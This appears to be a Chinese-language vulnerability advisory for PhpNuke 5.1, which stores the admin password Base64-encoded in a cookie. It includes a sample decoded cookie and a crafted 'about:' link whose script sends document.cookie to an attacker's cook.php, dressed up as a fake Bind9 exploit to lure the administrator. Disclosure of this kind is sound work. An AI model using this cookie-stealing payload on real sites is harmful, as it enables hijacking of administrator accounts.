PhpNuke管理员密码可泄露问题发布时间:2001-11-23 更新时间:2001-11-23 严重程度:高 威胁程度:口令恢复 错误类型:设计错误 利用方式:服务器模式 受影响系统 PhpNuke 5.1详细描述 PhpNuke把管理员的登陆名和密码保存在Cookie中如: ---snip--- lang english isecurelabs.com/ 0 725504896 29523774 551579360 29450340 * admin QWRtaW46TmljZV9Ucnk6DQo= isecurelabs.com/ 0 1451582336 29456384 3432929360 29450340 * ---snip--- 其管理员密码加密方式为BASE64,很容易破解如: QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try: 你可以在如下地址验证: http://www.isecurelabs.com/base64.php 另外一个问题可以利用"Microsoft IE COOKIE可以通过'About:' URLS" 来获得 COOKIE,详细信息可以参考: http://www.securiteam.com/windowsntfocus/6I00D1535I.html 如果攻击者建立一个收集环境变量信息getenv("QUERY_STRING") PHP脚本, 然后在建立一个如下连接发送给phpnuke管理员: [a href="about://www.nuked-site.com/[script]window.open("http://www.yourwebsite .com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9 remote root exploit ![/a] (<&>用[&]来代替)。 其中www.nuked-site.com是我们要想获得COOKIE的站点。 www.yourwebsute.com 是你通过cook.php获得COOKIE的站点。 这样管理员如果点击连接,他就会发送COOKIE给你的脚本。 测试代码 见描述 解决方案 尚无 相关信息 Cabezon Aurélien (aurelien.cabezon@isecurelabs.com) 参考:http://www.isecurelabs.com/article.php?sid=229 |
